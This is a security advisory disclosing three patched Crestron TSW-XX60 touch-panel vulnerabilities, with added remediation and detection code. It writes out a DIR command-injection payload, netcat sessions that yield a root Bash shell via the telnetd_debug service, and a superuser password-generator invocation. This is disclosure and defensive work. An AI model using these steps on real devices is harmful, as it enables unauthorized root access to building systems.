Security Advisory Regarding Crestron TSW-XX60 Touch Panel Devices

August 6, 2018

Crestron produces touchscreen devices, such as the TSW-XX60 series, which can be used to schedule meeting rooms in corporate offices. After the release of a recent device firmware update (which addressed several reported vulnerabilities), Security Compass is publishing the following security advisory.

Two remote code execution vulnerabilities and one elevation of privilege vulnerability were discovered and reported to Crestron by Security Compass’ Advisory team. The related technical details are now being disclosed, following Crestron’s latest patch that successfully remediated all reported issues.

The above vulnerabilities were reported to Crestron by Security Compass (Jackson Thuraisamy) in March 2018, and an active dialogue toward remediation continued until the release of patches in May 2018.

Unauthenticated Remote Code Execution via Command Injection in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018-11229

Vulnerability Details

A command-injection vulnerability existed in the Crestron TSW-XX60 touch panels that could be exploited through the CTP administrative interface open on port 41795. This Telnet-like text console is used by the Crestron Toolbox software to manage the devices. This interface does not list commands that could be used to directly access the underlying Android OS.

The CTP DIR command was vulnerable to command injection using a crafted command line payload with shell metacharacters. Output from the commands injected could be redirected into a text file on the device and read by adversaries.

Technical Description

The syntax of the DIR command allows a path to be specified:

DIR User/schedulingpanel

On the back end, the command executed on the Android system is:

ls -le "/mnt/sdcard/ROMDISK/User/schedulingpanel"

An adversary could modify the query to execute a command, such as the following:

ls -le "/mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt"

The built-in TYPE command could then be used to read the standard output of the whoami command:

TYPE output.txt
root

The base /mnt/sdcard/ROMDISK path could be discovered using built-in CTP commands (e.g. SCREENSHOT).
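The following example, added here and not taken from the Crestron firmware, contrasts the string-building pattern the advisory describes with a hardened version that validates the path and passes an argv list to the OS without a shell. The ROMDISK base path is the one shown above; the function names are hypothetical.

```python
import os
import re
import subprocess

# Base directory behind the CTP DIR command, as shown in the advisory.
ROMDISK = "/mnt/sdcard/ROMDISK"

# Characters a POSIX shell interprets; none of them belong in a ROMDISK path.
SHELL_META = re.compile(r'[;&|`$<>"\'\\\n\r]')


def vulnerable_dir_command(user_path: str) -> str:
    """The pattern described in the advisory: the caller-supplied path is
    spliced into a shell command string, so a closing quote followed by
    metacharacters is parsed by the shell instead of being treated as a path."""
    return f'ls -le "{ROMDISK}/{user_path}"'


def safe_dir_argv(user_path: str) -> list:
    """Hardened replacement: reject metacharacters, canonicalise the path,
    confine it to ROMDISK and return an argv list for a shell-free exec."""
    if SHELL_META.search(user_path):
        raise ValueError("shell metacharacters rejected")
    target = os.path.normpath(os.path.join(ROMDISK, user_path))
    # normpath collapses "../", so a traversal attempt resolves outside ROMDISK
    if target != ROMDISK and not target.startswith(ROMDISK + os.sep):
        raise ValueError("path escapes ROMDISK")
    return ["ls", "-le", target]


def run_dir(user_path: str) -> str:
    """Run the listing with shell=False: argv goes straight to execve and is
    never re-parsed, so quoting tricks in user_path cannot add commands."""
    argv = safe_dir_argv(user_path)
    return subprocess.run(argv, capture_output=True, text=True).stdout
```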

Unauthenticated Remote Code Execution via Bash Shell Service in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018-11228

Vulnerability Details

The Crestron TSW-XX60 panels have an administrative interface open on port 41795 (Crestron Terminal Protocol). This Telnet-like text console is used by the Crestron Toolbox software to manage the touch panel devices. This interface does not list commands that could be used to directly access the underlying Android OS.

Two conditions existed on the touch panel device that allowed an adversary to gain remote code execution:

1. A system service, called telnetd_debug, was capable of binding to a Bash shell on port 23 (this service is disabled by default).

2. An undocumented administrative command (RESTARTSERVICE) could be used to start services.

These conditions could be leveraged by disabling the running telnetd service with the TELNETPORT OFF command and then starting the telnetd_debug service with the RESTARTSERVICE command. Once this chain of tasks was performed, an interactive shell could be obtained with the ability to run arbitrary system commands on the device. If the user did not have the administrative privileges required for a terminal command, they could leverage the built-in SUDO command to elevate to root privileges (see CVE-2018-13341 below).

Technical Description

The Crestron Terminal Protocol console could be reached by connecting to port 41795 on the TSW-XX60 device, where the user was met with a command-line interface.

user@host:~$ nc -C 10.60.129.115 41795
TSW-760 Control Console
TSW-760> TELNETPORT
Telnet Port: On

The user could then disable the running Telnet service and start the telnetd_debug service.

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> RESTARTSERVICE telnetd_debug
Service telnetd_debug restarted

The telnetd_debug service could then be reached by connecting to port 23. In response, the user received an interactive Bash shell in which commands ran on the target device as the current user (i.e. root).

user@host:~$ nc -C 10.60.129.115 23
bash-3.2# whoami
root
bash-3.2# pwd
/
bash-3.2# uname -a
Linux TSW760 3.10.33 #3 SMP PREEMPT Mon Nov 6 16:52:32 EST 2017 armv7l GNU/Linux

Elevation of Privilege in Crestron Terminal Protocol

Identifier: CVE-2018-13341

Vulnerability Details

Crestron TSW-XX60 touch panel devices were affected by a privilege-escalation vulnerability that could be exploited through access to administrative credentials in the device firmware. If an adversary gained access to system binaries (e.g. by obtaining the firmware), they could leverage the “supwdgenerator” binary to generate administrative passwords for the built-in SUDO command.

This command allowed lower-privileged users to provide credentials that enabled them to run Crestron Terminal Protocol (CTP) commands as an administrator after authentication. After inspecting the device firmware and generating the correct passwords, an adversary could execute commands on the device as an administrator.

Technical Description

The HELP documentation in CTP provided information about commands and the privilege required to execute them. As shown below, the supported user roles are Administrator, Programmer, and Operator.

TSW-760> HELP ALL
...
GETANALOGJOIN   Programmer    Get a analog join value
GETAUDITLOG     Administrator Retrieve the audit log.
GETDIGITALJOIN  Programmer    Get a digital join value
GETPAsswordrule Administrator Display password rules
GETSERIALJOIN   Programmer    Get a serial join value
...
PING            Operator      Ping remote node
POEPLUS         Programmer    Enable/disable 24V
PRINTAUDITLOG   Administrator Print the audit log.
PROJECTREFresh  Administrator Sets time to Refresh project.
PROJECTRESTART  Programmer    Restart the user project.
...

One of the commands (SUDO) allowed a lower-privileged user to run commands as an Administrator. This was done by authenticating with a username and password.

TSW-760> SUDO
SUDO cmd [param1 param2 ...]
cmd: command to execute.
param1,param2,…: parameters for the command.
TSW-760> SUDO DIR
Username: idontknow
Password: *********
Invalid user name or password..

Firmware analysis indicated that two additional usernames (crengsuperuser and crsuperuser) were supported, and their passwords were derived from the MAC address of the Ethernet adapter.

An adversary with access to the supwdgenerator application could run it with the command line used by the ctpd application. An example follows:

user@host:~$ ./supwdgenerator AA.BB.CC.DD.EE.FF -ForEngineerOnly wDyB[redacted]A8

The adversary could then use the password to authenticate with the SUDO command, as shown below:

TSW-760> SUDO DIR
Username: crengsuperuser
Password: ****************
Directory of 
[DIR] 02-07-18 11:27:41 ROMDISK
[DIR] 09-29-17 18:07:06 SSHBanner
[DIR] 02-07-18 11:21:16 SYS
...
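The three issues above all surface as recognisable command sequences on the CTP console. The following detector, added here as an example and not part of the advisory or of any Crestron tooling, runs over a constructed console transcript in the "TSW-760> COMMAND" form shown in the sections above and flags the DIR injection pattern (CVE-2018-11229), the TELNETPORT OFF / RESTARTSERVICE telnetd_debug chain (CVE-2018-11228), and SUDO logins as the two built-in superuser accounts (CVE-2018-13341). The transcript, the prompt format assumed by the regex, and the function name are constructed.

```python
import re

# Constructed sample transcript of a CTP session on port 41795, in the
# "TSW-760> COMMAND args" form the advisory shows. Not a real capture.
SAMPLE_SESSION = """\
TSW-760 Control Console
TSW-760> TELNETPORT
Telnet Port: On
TSW-760> DIR User/schedulingpanel
TSW-760> DIR User"; whoami > "/mnt/sdcard/ROMDISK/output.txt
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> RESTARTSERVICE telnetd_debug
Service telnetd_debug restarted
TSW-760> SUDO DIR
Username: crengsuperuser
"""

PROMPT = re.compile(r"^\S+>\s*(\S+)\s*(.*)$")      # "<prompt>> CMD args"
SHELL_META = re.compile(r'[;&|`$<>"\'\\]')           # shell-significant bytes
BUILTIN_SUPERUSERS = {"crengsuperuser", "crsuperuser"}  # names from the advisory


def detect_ctp_abuse(transcript: str) -> list:
    """Return (line_no, finding) pairs for the three patterns in the advisory."""
    findings = []
    telnet_off_seen = False
    for n, line in enumerate(transcript.splitlines(), 1):
        m = PROMPT.match(line)
        if m:
            cmd, args = m.group(1).upper(), m.group(2).strip()
            if cmd == "DIR" and SHELL_META.search(args):
                findings.append((n, "CVE-2018-11229: shell metacharacters in DIR path"))
            elif cmd == "TELNETPORT" and args.upper() == "OFF":
                telnet_off_seen = True      # first half of the debug-shell chain
            elif cmd == "RESTARTSERVICE" and args == "telnetd_debug":
                tag = "after TELNETPORT OFF" if telnet_off_seen else "without TELNETPORT OFF"
                findings.append((n, f"CVE-2018-11228: telnetd_debug started {tag}"))
            continue
        # SUDO prompts for a username on its own line, without the console prompt
        um = re.match(r"^Username:\s*(\S+)", line)
        if um and um.group(1) in BUILTIN_SUPERUSERS:
            findings.append((n, f"CVE-2018-13341: SUDO login as {um.group(1)}"))
    return findings
```

Any RESTARTSERVICE telnetd_debug is reported even when TELNETPORT OFF was not observed, since the transcript may have started mid-session.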

Disclosure Process

  • Following Security Compass’ responsible disclosure process, Crestron PSIRT was notified of the vulnerabilities on March 9, 2018.
  • A response was promptly received from Crestron that they were investigating the matter with their engineering team.
  • Crestron acknowledged that the vulnerabilities were true positives and that they were investigating remediation.
  • A general release patch was available on May 30, 2018.

To learn more about Security Compass’ Verification Services, read about them here: https://www.securitycompass.com/advisory/services/verification/.

Author: Steven Patterson, Consultant at Security Compass
Special thanks to Jackson Thuraisamy.
